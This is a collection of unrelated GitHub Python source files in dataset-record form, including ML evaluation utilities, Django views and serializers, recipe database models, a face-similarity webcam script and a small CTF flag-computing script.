x_train, x_test, y_train, y_test = train_test_split(self.features, self.target, test_size=0.2, random_state=42)\n x_train_vec = self._get_vectors(x_train)\n x_test_vec = self._get_vectors(x_test)\n return x_train_vec, x_test_vec, y_train, y_test\n\n def _validate(self, x_test_vec, y_test):\n preds = self.model.predict_proba(x_test_vec)\n self.roc_auc_score = roc_auc_score(y_test, preds[:, 1])\n self.average_precision_score = average_precision_score(y_test, preds[:, 1])\n print('ROC-AUC: {:.4f}'.format(self.roc_auc_score))\n print('PR-AUC: {:.4f}'.format(self.average_precision_score))\n self.roc_c = roc_curve(y_test, preds[:, 1])\n self.prec_rec = precision_recall_curve(y_test, preds[:, 1])\n self.plot()\n\n def fit_model(self, model_type='logit'):\n self.model_type = model_type\n x_train_vec, x_test_vec, y_train, y_test = self._prepare_data()\n if model_type == 'logit':\n from sklearn.linear_model import LogisticRegression\n lr = LogisticRegression(penalty='l1')\n lr.fit(x_train_vec, y_train)\n self.model = lr\n self._validate(x_test_vec, y_test)\n\n def predict_proba(self, sample):\n return self.model.predict_proba(sample)\n\n def build_important_track(self):\n if self.model_type == 'logit':\n imp = self.model.coef_\n if self.emb_type == 'tf-idf':\n imp = self._embedder.inverse_transform(imp)[0]\n edges = []\n for i in imp:\n j = i.split()\n if len(j) == 2:\n edges.append(j)\n elif len(j) > 2:\n for k in range(1, len(j)):\n edges.append([j[k - 1], j[k]])\n elif len(j) == 1:\n edges.append([j[0], None])\n return 
pd.DataFrame(edges).drop_duplicates()\n\n def _get_tsne(self, sample):\n return TSNE().fit_transform(sample.todense())\n\n def plot_projections(self, sample=None, target=None, ids=None):\n if sample is None:\n self._plot_proj_sample(self.features, self.target, self.users)\n else:\n self._plot_proj_sample(sample, target, ids)\n\n def _plot_proj_sample(self, sample, target=None, ids=None):\n pre_vec = self._get_vectors(sample)\n vec = self._get_tsne(pre_vec)\n self._cached_tsne = vec\n self._tsne_sample = sample\n if ids is not None:\n self._tsne_users = ids\n\n if ids is not None:\n txt = np.array(['user_id: {}'.format(i) for i in ids])\n else:\n txt = None\n\n if target is not None:\n figs = []\n for i in np.unique(target):\n figs.append(\n go.Scatter(\n x=vec[target == i][:, 0],\n y=vec[target == i][:, 1],\n name=str(i),\n mode='markers',\n text=list(txt[target == i]) if txt is not None else txt,\n )\n )\n else:\n probs = self.predict_proba(pre_vec)[:, 1]\n if txt is not None:\n txt = [i + ',\\n prob: {}'.format(j) for i, j in zip(txt, probs)]\n else:\n txt = ['prob: {}'.format(i) for i in probs]\n\n figs = [go.Scatter(\n x=vec[:, 0],\n y=vec[:, 1],\n mode='markers',\n marker=dict(\n color=probs,\n colorscale='YlGnBu',\n showscale=True\n ),\n text=txt, )]\n\n py.init_notebook_mode()\n py.iplot(figs)\n filename = os.path.join(self.export_folder, 'tsne {}.html'.format(datetime.now()))\n py.plot(figs, filename=filename, auto_open=False)\n\n def _get_data_from_plot(self, bbox):\n bbox = np.array(bbox)\n left = bbox[:, 0].min()\n right = bbox[:, 0].max()\n up = bbox[:, 1].max()\n bot = bbox[:, 1].min()\n res = self._cached_tsne\n fil = (res[:, 1] < up) & (res[:, 1] > bot) & (res[:, 0] < right) & (res[:, 0] > left)\n users = self._tsne_users[fil]\n data = self._source_data[self._source_data.user_pseudo_id.isin(users)]\n return data\n\n def plot_cluster_track(self, bbox):\n data = self._get_data_from_plot(bbox)\n data_agg = get_all_agg(data, ['trans_count'])\n plot_graph_python(data_agg, 'trans_count', {'export_folder': self.export_folder})\n\n def _check_folder(self, settings):\n settings = check_folder(settings)\n self.export_folder = settings['export_folder']\n\n def plot(self):\n f, ax = plt.subplots(1, 2)\n f.set_size_inches(15, 5)\n ax[0].plot(self.roc_c[0], self.roc_c[1])\n ax[0].set_title('ROC curve')\n ax[1].plot(self.prec_rec[1], self.prec_rec[0])\n ax[1].set_title('Precision-Recall curve')\n plt.grid()\n filename = os.path.join(self.export_folder, 'scores {}.png'.format(datetime.now()))\n f.savefig(filename)\n","repo_name":"bagavievaskar/aita","sub_path":"retentioneering/analysis/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":8234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"32748072069","text":"import hashlib\r\nres=hashlib.md5(b'zhishixuebao').hexdigest()\r\nprint(res)\r\nflag='flag{'\r\nfor i in range(0,len(res),2):\r\n flag+=res[i]\r\na = list('0'*15)\r\nfor i in range(15):\r\n value = 255 - 98 - i - ord(a[i])+2\r\n a[i] = chr(value)\r\nflag+=\"\".join(str(i) for i in a)+\"}\"\r\nprint(flag)","repo_name":"scnu-sloth/XSCTF-2022-Quals","sub_path":"Reverse-easyEZbaby_app/exp/exp.py","file_name":"exp.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"30310647166","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom imblearn.over_sampling import SMOTE\nfrom imblearn.under_sampling 
import RandomUnderSampler\nfrom sklearn.metrics import accuracy_score, precision_score,\\\n recall_score, roc_auc_score, f1_score, classification_report,\\\n roc_curve, auc\nfrom sklearn.metrics import plot_confusion_matrix\nfrom sklearn.model_selection import learning_curve\n\n\ndef undersample(x, y):\n \"\"\"\n Undersampling by randomly selecting samples from majority class.\n\n :param x: dataframe with attributes for training (independent\n variables).\n :param y: dataframe with label attribute (dependent variable).\n :return: x and y after undersampling performed.\n \"\"\"\n rus = RandomUnderSampler(random_state=3)\n return rus.fit_resample(x, y)\n\n\ndef oversample(x, y):\n \"\"\"\n Perform oversampling using SMOTE method.\n\n :param x: dataframe with attributes for training (independent\n variables).\n :param y: dataframe with label attribute (dependent variable).\n :return: x and y after oversampling performed.\n \"\"\"\n smote = SMOTE(random_state=42)\n return smote.fit_resample(x, y)\n\n\ndef compare_models(models, names, x, y):\n \"\"\"\n Draw table with model and their performance.\n\n :param models: list of trained models.\n :param names: list of names of models.\n :param x: dataframe with data for prediction.\n :param y: dataframe with expected labels.\n \"\"\"\n max_len = np.max([len(x) for x in names])\n print(\" \".ljust(max_len) + \" Accuracy F1 (micro) F1 (macro)\"\n \" Precision Recall AUC ROC\")\n for i, model in enumerate(models):\n y_pred = model.predict(x)\n y_pred_prob = model.predict_proba(x)[:, 1]\n print(f\"{names[i]}\" + \"\".ljust(max_len-len(names[i])) + \" \"\n f\"| {accuracy_score(y, y_pred):.2f} \"\n f\"| {f1_score(y, y_pred, average='micro'):.2f} \"\n f\"| {f1_score(y, y_pred, average='macro'):.2f} \"\n f\"| {precision_score(y, y_pred):.2f} \"\n f\"| {recall_score(y, y_pred):.2f} \"\n f\"| {roc_auc_score(y, y_pred_prob):.2f} |\")\n\n\ndef evaluate_model(model, x, y):\n \"\"\"\n Print evaluation of model.\n\n :param model: model to be evaluated.\n :param x: dataframe with data for prediction.\n :param y: dataframe with expected labels.\n \"\"\"\n y_pred = model.predict(x)\n y_pred_prob = model.predict_proba(x)[:, 1]\n\n fig, axs = plt.subplots(nrows=1, ncols=2,\n figsize=(12, 4), constrained_layout=True)\n plot_confusion_matrix(\n model, x, y, cmap=plt.cm.Blues, normalize='true', ax=axs[0]\n )\n roc_auc(y_pred_prob, y, ax=axs[1])\n print(classification_report(y, y_pred))\n print(f'ROC AUC score: {round(roc_auc_score(y, y_pred_prob), 3)}')\n\n\ndef roc_auc(y_pred_prob, y_true, plot=True, label=\"curve\", ax=None):\n \"\"\"\n Draw ROC curve plot.\n\n :param y_pred_prob: probabilitie of predicted labels.\n :param y_true: true labels.\n :param plot: if True, ROC curve plot is drawn.\n :param label: label of a plot.\n :param ax: optional axis for plot.\n :return: ROC AUC score.\n \"\"\"\n fpr, tpr, _ = roc_curve(y_true, y_pred_prob)\n auc_value = auc(fpr, tpr)\n\n if plot:\n if not ax:\n fig, ax = plt.subplots()\n ax.scatter(x=fpr, y=tpr, color='navy')\n ax.plot(\n fpr, tpr,\n c=tuple(np.random.rand(3, 1)[:, 0]),\n lw=2,\n label=f'{label} (AUC = {round(auc_value, 3)})'\n )\n ax.plot([0, 1], [0, 1], color='navy', lw=2, linestyle='--')\n ax.set_xlim([0.0, 1.0])\n ax.set_ylim([0.0, 1.05])\n ax.set_xlabel('False Positive Rate')\n ax.set_ylabel('True Positive Rate')\n ax.set_title('ROC Curve')\n ax.legend(loc=\"lower right\")\n\n return auc_value\n\n\ndef plot_feature_importance(\n importance,\n feature_names,\n max_num=-1,\n reverse_order=False\n):\n \"\"\"\n Plot 
features sorted by importance.\n\n :param importance: importance of features.\n :param feature_names: names of features.\n :param max_num: maximal number of features to show.\n :param reverse_order: whether importances are in reverse order.\n :return: feature names sorted by importance.\n \"\"\"\n indexes = np.argsort(importance)\n names = []\n feature_importance = []\n\n if reverse_order:\n indexes = list(reversed(indexes))\n\n for i in indexes:\n names.append(feature_names[i])\n feature_importance.append(importance[i])\n\n plt.figure(figsize=(10, len(feature_names[:max_num]) // 2))\n plt.barh(names[-max_num::], feature_importance[-max_num::])\n plt.yticklabels = names\n\n return names[::-1]\n\n\ndef plot_learning_curve(\n estimator, title, X, y, cv=None, train_sizes=np.linspace(.1, 1.0, 10)\n):\n \"\"\"\n Plot learning curve of classifier.\n\n Function taken and edited from:\n https://scikit-learn.org/stable/auto_examples/model_selection/plot_learning_curve.html\n\n :param estimator: classifier of which learning curve will be drawn.\n :param title: title of learning curve plot.\n :param X: training data features.\n :param y: training data labels.\n :param cv: cross-validation (estimator or number of folds).\n :param train_sizes: train splits sizes.\n :return:\n \"\"\"\n plt.figure()\n plt.title(title)\n plt.ylim(0.45, 1.01)\n plt.xlabel('Number of samples', labelpad=20)\n plt.ylabel('Score', labelpad=20)\n train_sizes, train_scores, test_scores = learning_curve(\n estimator, X, y, cv=cv, n_jobs=-1, train_sizes=train_sizes)\n train_scores_mean = np.mean(train_scores, axis=1)\n train_scores_std = np.std(train_scores, axis=1)\n test_scores_mean = np.mean(test_scores, axis=1)\n test_scores_std = np.std(test_scores, axis=1)\n plt.grid()\n\n plt.fill_between(train_sizes, train_scores_mean - train_scores_std,\n train_scores_mean + train_scores_std, alpha=0.1,\n color=\"r\")\n plt.fill_between(train_sizes, test_scores_mean - test_scores_std,\n test_scores_mean + test_scores_std, alpha=0.1, color=\"g\")\n plt.plot(train_sizes, train_scores_mean, 'o-', color=\"r\",\n label='Train score')\n plt.plot(train_sizes, test_scores_mean, 'o-', color=\"g\",\n label='Cross-validation score')\n\n plt.legend(loc='best')\n return plt\n\n\nclass CombinedModel:\n \"\"\"\n CombinedModel class serve for combining several model to obtain one\n prediction. 
Model is selected by rule defined in `ruler`.\n\n :param models: list of models.\n :param ruler: function that return index of model to by used\n depending on rule from `ruler`.\n \"\"\"\n def __init__(self, models, ruler):\n super().__init__()\n self.models = models\n self.ruler = ruler\n\n def predict(self, x, probabilities=False):\n \"\"\"\n Make predictions depending on rules.\n\n :param x: test samples to be predicted.\n :param probabilities: return probabilities instead predictions.\n :return: list of predictions for all test samples.\n \"\"\"\n pred = np.zeros(x.shape[0])\n for i, model in enumerate(self.models):\n idxs = x[x.apply(self.ruler, axis=1) == i].index\n if probabilities:\n pred[idxs] = model.predict_proba(x.loc[idxs])[:, 1]\n else:\n pred[idxs] = model.predict(x.loc[idxs])\n return pred\n","repo_name":"pmacinec/diabetes-patients-readmissions-prediction","sub_path":"src/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":7523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"32021713051","text":"from rest_framework import serializers\n\nfrom general.models import Blog\n\n\nclass ListBlogSerializer(serializers.ModelSerializer):\n created_at = serializers.SerializerMethodField()\n\n class Meta:\n model = Blog\n fields = (\n 'id',\n 'title',\n 'sub_title',\n 'description',\n 'thumbnail',\n 'image',\n 'tags',\n 'author',\n 'slug',\n 'created_at'\n )\n\n \n def get_created_at(self, instance):\n if instance.created_at:\n instance_date = instance.created_at\n \n day_number = instance_date.day\n month_name = instance_date.strftime(\"%B\")\n year_number = instance_date.year\n\n date = f'{day_number} {month_name} {year_number}'\n\n return date\n else:\n return None\n \n\n\n \n ","repo_name":"devaccolades/english-cafe","sub_path":"api/v1/general/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"73255916350","text":"import numpy as np\n\ndef cosine_similarity(arr1, arr2, PRINT_NAME=False):\n if PRINT_NAME: print(\"cosine:\")\n numerator = 0\n arr1_vector_length_squared = 0\n arr2_vector_length_squared = 0\n for i, x in enumerate(arr1):\n numerator += x*arr2[i]\n arr1_vector_length_squared += pow(x,2)\n arr2_vector_length_squared += pow(arr2[i], 2)\n\n return round((numerator/(np.sqrt(arr1_vector_length_squared)*np.sqrt(arr2_vector_length_squared))),3)\n\n\ndef mean(arr):\n return sum(arr)/len(arr)\n\ndef print_pearson_similarity(arr1, arr2, array_id_1=1, array_id_2=2, PRINT_NAME=False):\n \"\"\"\n use -1 for unknown values, any number for known values\n \"\"\"\n if PRINT_NAME: print(\"pearson:\")\n arr1_ignored = [x for x in arr1 if x!=-1]\n arr2_ignored = [x for x in arr2 if x!=-1]\n\n m1 = mean(arr1_ignored)\n m2 = mean(arr2_ignored)\n\n print(f\"m{array_id_1}=sum({arr1_ignored})/{len(arr1_ignored)}={m1}\")\n print(f\"m{array_id_2}=sum({arr2_ignored})/{len(arr2_ignored)}={m2}\")\n\n r1 = [x-m1 if x!=-1 else 0 for x in arr1]\n r2 = [x-m2 if x!=-1 else 0 for x in arr2]\n\n r1_calculation = f\"r{array_id_1}={[f'{x}-{m1}' if x!=-1 else 0 for x in arr1]}\"\n r1_calculation_without_quotes = r1_calculation.replace(\"'\", \"\")\n print(r1_calculation_without_quotes)\n\n r2_calculation = f\"r{array_id_2}={[f'{x}-{m2}' if x!=-1 else 0 for x in arr2]}\"\n r2_calculation_without_quotes = r2_calculation.replace(\"'\", \"\")\n 
print(r2_calculation_without_quotes)\n\n print(f\"cos(r{array_id_1},r{array_id_2})={cosine_similarity(r1, r2)}\")\n\n\ndef print_jaccard_similarity(arr1, arr2, PRINT_NAME=False):\n \"\"\"\n use number <=0 for negative/unknown values, >0 for known/positive values\n \"\"\"\n if PRINT_NAME: print(\"jaccard:\")\n numerator = sum([1 if (x>0 and y>0) else 0 for x,y in zip(arr1,arr2)])\n denominator = sum([1 if (x>0 or y>0) else 0 for x,y in zip(arr1,arr2)])\n answer = round(numerator/denominator, 3)\n\n print(f\"({[1 if (x>0 and y>0) else 0 for x,y in zip(arr1,arr2)]})/({[1 if (x>0 or y>0) else 0 for x,y in zip(arr1,arr2)]})={numerator}/{denominator}={answer}\")\n\n\n\narr1 = [-1,0,0,0,1]\narr2 = [0,1,1,1,0]\n\nprint(cosine_similarity(arr1, arr2, True))\n\nprint(\"-----------------------------\")\n\narr1 = [1, 2, 2, 3, 3]\narr2 = [1, 0, 1, 2, 3]\n\narr_id_1 = 4\narr_id_2 = 5\n\nprint_pearson_similarity(arr1, arr2, arr_id_1, arr_id_2, True)\n\nprint(\"-----------------------------\")\n\n\ns0 = [0,0,0,1,0,1]\ns1 = [0,0,2,4,0,2]\ns2 = [2,2,0,4,2,0]\ns3 = [2,2,0,4,2,0]\ns4 = [2,2,0,3,0,0]\ns5 = [2,2,0,3,0,0]\n\n\nprint_jaccard_similarity(s0, s2, True)","repo_name":"trymgrande/ITHINGDA-MSIT","sub_path":"semester 8/exam-scripts/Big Data/similarity.py","file_name":"similarity.py","file_ext":"py","file_size_in_byte":2582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"18613626019","text":"from typing import List\n\n\ndef largestRectangleArea(heights: List[int]) -> int:\n if max(heights) == min(heights):\n return max(heights) * len(heights)\n heights.append(0)\n s = []\n ans = [0] * len(heights)\n for i in range(len(heights)):\n for j in range(len(s) - 1, -1, -1):\n if heights[s[j]] > heights[i]:\n ans[j] = heights[s[j]] * (i - s[j])\n heights[s[j]] = heights[i]\n else:\n break\n s.append(i)\n return max(ans)\n\n\ndef largestRectangleArea2(heights: List[int]) -> int:\n if max(heights) == min(heights):\n return max(heights) * len(heights)\n\n heights = [0] + heights + [0]\n n = len(heights)\n res = [0] * n\n stack = [0]\n\n for i in range(1, n):\n while heights[i] < heights[stack[-1]]:\n pos = stack.pop()\n res[pos] = heights[pos] * (i - stack[-1] - 1)\n stack.append(i)\n\n return max(res)\n\n\nheights = [2,1,2]\nprint(largestRectangleArea2(heights))\n","repo_name":"Aitar/Practice","sub_path":"python/单调栈/柱状图中最大的矩形.py","file_name":"柱状图中最大的矩形.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"25726725771","text":"import numpy as np\n\n\n\nclass RNNBatchGenerator(object):\n \"\"\"\n Class to produce batch generator required by any derived class\n of AbstrctRNN\n \"\"\"\n def __init__(self):\n super(RNNBatchGenerator, self).__init__()\n\n def get_batches(self, rnn, arr_x, arr_y):\n \"\"\"\n Abstract method to return the generator.\n Must be implemented in a derived class\n \"\"\"\n raise NotImplementedError(\"must be implemented in a derived class\")\n\n\nclass OneDSlidingGenerator(RNNBatchGenerator):\n \"\"\"\n Class to produce a sliding batch generator for next item prevision.\n Returns batch of x and y where y is simply the one shifted values of x\n \"\"\"\n def __init__(self):\n super(OneDSlidingGenerator, self).__init__()\n\n def get_batches(self, rnn, arr_x, arr_y):\n '''\n Create a generator that returns batches of size\n batch_size x n_steps from arr_x.\n\n Arguments\n ---------\n rnn: instance of any derived class of AstractRNN.\n 
arr_x: 1-d Array you want to make batches from\n arr_y: not used\n '''\n # Get the number of characters per batch and number of batches we can make\n characters_per_batch = rnn.batch_size * rnn.n_steps\n n_batches = len(arr_x) // characters_per_batch\n\n # Keep only enough characters to make full batches\n arr_x = arr_x[0:(n_batches * characters_per_batch)]\n\n # Reshape into batch_size rows\n arr_x = arr_x.reshape(rnn.batch_size, len(arr_x) // rnn.batch_size)\n\n for n in range(0, arr_x.shape[1], rnn.n_steps):\n # The features\n x = arr_x[:, n:n+rnn.n_steps]\n # The targets, shifted by one\n y_temp = arr_x[:, n+1:n+rnn.n_steps+1]\n\n # For the very last batch, y will be one character short at the end of\n # the sequences which breaks things. To get around this, I'll make an\n # array of the appropriate size first, of all zeros, then add the targets.\n # This will introduce a small artifact in the last batch, but it won't matter.\n y = np.zeros(x.shape, dtype=x.dtype)\n y[:,:y_temp.shape[1]] = y_temp\n yield x, y\n\nclass ListOfArrayGenerator(RNNBatchGenerator):\n \"\"\"\n Class to produce a batch generator of arrays.\n \"\"\"\n\n def __init__(self):\n super(ListOfArrayGenerator, self).__init__()\n\n def get_batches(self, rnn, arr_x, arr_y):\n n_batches = len(arr_x) // rnn.batch_size\n arr_x = arr_x[0:(n_batches * len(arr_x))]\n arr_y = arr_y[0:(n_batches * len(arr_y))]\n\n for n in range(0, n_batches):\n yield (np.array(arr_x[n:n+rnn.batch_size]),\n np.array([arr_y[n:n+rnn.batch_size]]).T)\n\n\n\n\n","repo_name":"fpercerou/udacity","sub_path":"deep_learning_nanodegree/course_4_rnn/lesson_3_lstm_implementation/rnn_batch_generators.py","file_name":"rnn_batch_generators.py","file_ext":"py","file_size_in_byte":2763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"11499730027","text":"import datetime\nfrom flask import request\nfrom config.apps import db\n\nclass Menu(db.Model):\n __tablename__ = 'menu'\n menu_id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(300), unique=True, nullable=False)\n description = db.Column(db.Text(), nullable=False)\n rating = db.Column(db.DECIMAL(asdecimal=False), default=0.0)\n img_url = db.Column(db.String(50), nullable=True)\n recipes = db.relationship('Recipe', backref='menu', lazy='dynamic')\n\n create_time = db.Column('created_at', db.DateTime, default=datetime.datetime.now)\n update_time = db.Column('last_updated', db.DateTime, default=datetime.datetime.now, onupdate=datetime.datetime.now)\n\n def __repr__(self):\n return ''.format(self.menu_id)\n\nclass RecipeIngredient(db.Model):\n __tablename__ = 'recipe_ingredient'\n recipe_id = db.Column('recipe_id', db.Integer, db.ForeignKey('recipe.recipe_id'), primary_key=True)\n ingredient_id = db.Column('ingredient_id', db.Integer, db.ForeignKey('ingredient.ingredient_id'), primary_key=True)\n quantity = db.Column('quantity', db.DECIMAL(asdecimal=False)),\n\n\nclass Recipe(db.Model):\n __tablename__ = 'recipe'\n recipe_id = db.Column(db.Integer, primary_key=True)\n menu_id = db.Column(db.Integer, db.ForeignKey('menu.menu_id'))\n name = db.Column(db.String(20))\n description = db.Column(db.Text())\n img_url = db.Column(db.String(255))\n instructions = db.relationship('Instruction', backref='recipe', lazy='dynamic')\n ingredients = db.relationship('Ingredient', secondary='recipe_ingredient', lazy='subquery', backref=db.backref('recipe', lazy=True))\n \n create_time = db.Column('created_at', db.DateTime, 
default=datetime.datetime.now)\n update_time = db.Column('last_updated', db.DateTime, default=datetime.datetime.now, onupdate=datetime.datetime.now)\n\n def __repr__(self):\n return ''.format(self.recipe_id)\n\nclass Ingredient(db.Model):\n __tablename__ = 'ingredient'\n ingredient_id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(20))\n description = db.Column(db.Text())\n img_url = db.Column(db.String(255))\n measure_number = db.Column(db.Integer)\n measure_type = db.Column(db.String(20))\n energy = db.Column(db.Integer)\n fat = db.Column(db.Integer)\n carbohydrate = db.Column(db.Integer)\n protien = db.Column(db.Integer)\n sodium = db.Column(db.Integer)\n recipes = db.relationship('Recipe', secondary='recipe_ingredient', lazy='subquery', backref=db.backref('ingredient', lazy=True))\n \n create_time = db.Column('created_at', db.DateTime, default=datetime.datetime.now)\n update_time = db.Column('last_updated', db.DateTime, default=datetime.datetime.now, onupdate=datetime.datetime.now)\n\n def __repr__(self):\n return ''.format(self.id)\n\nclass Instruction(db.Model):\n instruction_id = db.Column(db.Integer, primary_key=True)\n recipe_id = db.Column(db.Integer, db.ForeignKey('recipe.recipe_id'))\n description = db.Column(db.Text())\n step_number = db.Integer\n img_url = db.Column(db.String(255))\n\n create_time = db.Column('created_at', db.DateTime, default=datetime.datetime.now)\n update_time = db.Column('last_updated', db.DateTime, default=datetime.datetime.now, onupdate=datetime.datetime.now)","repo_name":"ash-rwt/hello-fresh","sub_path":"backend/models/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"32553063442","text":"from multiprocessing import Process, Manager, Value\nimport pickle\nimport math\nimport time\n\nimport cv2\nimport face_recognition\nimport dlib\nimport numpy as np\n\n\n# databaseの読み込み\ndatas = {}\nwith open('mini_data.pickle', mode='rb') as f:\n datas = pickle.load(f)\n\n\ndef get_distance(a, b):\n \"\"\"\n 画像間の類似度を測定する\n :param a: list\n :param b: list\n :return: float\n \"\"\"\n distance = 0\n for i in range(len(a)):\n distance += (a[i] - b[i]) ** 2\n return math.sqrt(distance)\n\n\ndef concat_tile(im_list_2d):\n \"\"\"\n イメージをタイル状に敷き詰める\n :param im_list_2d: list(2d)\n :return:\n \"\"\"\n return cv2.vconcat([cv2.hconcat(im_list_h) for im_list_h in im_list_2d])\n\n\ndef recommend_faces(similar_paths_manager, frame_manager):\n \"\"\"\n カメラ映像から取得した人物の類似顔を探し出す関数\n \"\"\"\n while True:\n print(frame_manager)\n if not frame_manager:\n continue\n frame = np.ndarray(frame_manager[:])\n # 顔認識\n detector = dlib.get_frontal_face_detector()\n\n # 顔データ(人数分)\n rects = detector(frame, 1)\n\n # 顔認識できなかったとき\n if not rects:\n print(\"cant recognize faces\")\n\n continue\n\n dsts = []\n for rect in rects:\n dst = frame[rect.top():rect.bottom(), rect.left():rect.right()]\n dsts.append(dst)\n\n # 距離測定(とりあえず一人だけ)\n # 顔情報のベクトル化 類似配列の生成\n try:\n target_image_encoded = face_recognition.face_encodings(dsts[0])[0]\n except IndexError:\n continue\n\n similar_vecs = []\n similar_paths = []\n similar_distances = []\n\n i = 0\n for k in datas:\n distance = get_distance(datas[k], list(target_image_encoded))\n # 最初\n if i == 0:\n similar_distances.append(distance)\n similar_paths.append(k)\n similar_vecs.append(datas[k])\n i += 1\n for j in range(len(similar_distances)):\n # 10個以上\n if len(similar_distances) >= 10:\n # より近い\n if 
similar_distances[j] > distance:\n similar_distances.insert(j, distance)\n similar_paths.insert(j, k)\n similar_vecs.insert(j, datas[k])\n del similar_distances[-1]\n del similar_paths[-1]\n del similar_vecs[-1]\n break\n # 10個以下\n else:\n if similar_distances[j] > distance:\n similar_distances.insert(j, distance)\n similar_paths.insert(j, k)\n similar_vecs.insert(j, datas[k])\n break\n if j == len(similar_distances) - 1:\n similar_distances.append(distance)\n similar_paths.append(k)\n similar_vecs.append(datas[k])\n\n # print(\"{0}:{1}\".format(k, distance))\n # print(\"number{} is end\".format(i))\n i += 1\n print(\"finish about one face\")\n similar_paths_manager = similar_paths\n\n\ndef take_video(frame_manager):\n \"\"\"\n 入力データを生成する関数\n \"\"\"\n cap = cv2.VideoCapture(0) # 引数はカメラのデバイス番号\n while True:\n ret, frame = cap.read()\n # to break the loop by pressing esc\n frame_manager = list(frame)\n cv2.imshow(\"extra\", frame)\n k = cv2.waitKey(1)\n\n if k == 27:\n print(\"released!\")\n break\n cap.release()\n cv2.destroyAllWindows()\n print(\"release camera!!!\")\n\n\nif __name__ == '__main__':\n with Manager() as manager:\n similar_paths_manager = manager.list()\n frame_manager = manager.list()\n\n # プロセスの生成\n video_process = Process(target=take_video, args=[frame_manager,], name=\"video\")\n recommend_process = Process(target=recommend_faces, args=[similar_paths_manager, frame_manager], name=\"recommend\")\n\n # プロセスの開始\n video_process.start()\n recommend_process.start()\n\n\n","repo_name":"onikazu/FaceMandara","sub_path":"trash/face_mandara_manager.py","file_name":"face_mandara_manager.py","file_ext":"py","file_size_in_byte":4406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"74907470590","text":"from bs4 import BeautifulSoup\nimport requests\nfrom rich.console import Console\nfrom rich.table import Table\nimport pandas as pd\n\nurlA = \"https://www.heywhale.com/v2/api/tasks/62353f220cfed900174d7ef1/leaderboard?template=true\"\nurlB = \"https://www.heywhale.com/v2/api/tasks/625f69d2697f5d0018062ef9/leaderboard?template=true\"\ntextA = requests.get(urlA).text\ntextB = requests.get(urlB).text\n\ndef get_score(text):\n soup = BeautifulSoup(text, \"html.parser\")\n scores = {}\n for team in soup.findAll(\"tr\", {\"data-team-id\": True}):\n team_name = team.findAll(\"td\", {\"class\": lambda x: x == \"team-cell\"})[0].text.strip()\n team_name = team_name.replace(\"的团队\", \"\")\n score = float(team.findAll(\"td\", {\"class\": lambda x: x == \"submit-score\"})[0].text.strip().split(\"\\n\")[0])\n scores[team_name] = score\n return scores\n\nA, B = get_score(textA), get_score(textB)\n\ndfA = pd.DataFrame({\"team_name\": A.keys(), \"score_A\": A.values()})\ndfA = dfA.sort_values(\"score_A\", ascending = False).reset_index(drop = True)\ndfA[\"rank_A\"] = dfA.index + 1\ndfB = pd.DataFrame({\"team_name\": B.keys(), \"score_B\": B.values()})\ndfB = dfB.sort_values(\"score_B\", ascending = False).reset_index(drop = True)\ndfB[\"rank_B\"] = dfB.index + 1\ndf = pd.merge(dfA, dfB, how = \"outer\")\ndf.rank_A = df.rank_A.fillna(df.rank_A.max() + 1).astype(int)\ndf.rank_B = df.rank_B.fillna(df.rank_B.max() + 1).astype(int)\ndf.score_A = df.score_A.fillna(0)\ndf.score_B = df.score_B.fillna(0)\ndf = df.sort_values([\"rank_B\", \"rank_A\"])\ndf[\"score_change\"] = df.score_B - df.score_A\ndf[\"rank_change\"] = [\"+\" + str(_) if _ > 0 else str(_) for _ in (df.rank_A - df.rank_B) * (df.score_B != 0)]\n\n\ntable = Table(row_styles = [\"dim\", 
\"\"])\ncolors = [\"red\", \"green\", \"blue\", \"green\", \"blue\", \"green\", \"blue\"]\nfor i, col in enumerate(df.columns):\n table.add_column(col, style = colors[i])\n\n\nfor _, row in df.iterrows():\n table.add_row(*[x if isinstance(x, str) else str(x) if isinstance(x, int) else f\"{x:.4f}\" for x in row])\n\n\nconsole = Console()\nconsole.print(table)\n","repo_name":"CarnoZhao/utils","sub_path":"Ranker.py","file_name":"Ranker.py","file_ext":"py","file_size_in_byte":2044,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"60"} +{"seq_id":"24620331454","text":"from django.shortcuts import render, redirect, reverse\nfrom pages.forms import SubscriberForm\n# Create your views here.\n\n\ndef view_cart(request):\n \"\"\"See contents of cart also renders the subcribe\n form in the context\"\"\"\n context = {\n 'newsletter_form': SubscriberForm()\n }\n return render(request, \"cart.html\", context)\n\n\ndef add_to_cart(request, id):\n \"\"\"Add a qty of product to the cart\"\"\"\n quantity = int(request.POST.get('quantity'))\n\n cart = request.session.get('cart', {})\n cart[id] = cart.get(id, 0) + quantity\n\n request.session['cart'] = cart\n return redirect(reverse('products'))\n\n\ndef adjust_cart(request, id):\n \"\"\"Adjust qty of items in cart\"\"\"\n quantity = int(request.POST.get('quantity'))\n cart = request.session.get('cart', {})\n\n if quantity > 0:\n cart[id] = quantity\n else:\n cart.pop(id)\n\n request.session['cart'] = cart\n return redirect(reverse('view_cart'))\n\n\ndef delete_cart_item(request, id):\n \"\"\"Delete of remove an item from the cart\"\"\"\n cart = request.session.get('cart', {})\n\n cart.pop(id)\n\n request.session['cart'] = cart\n return 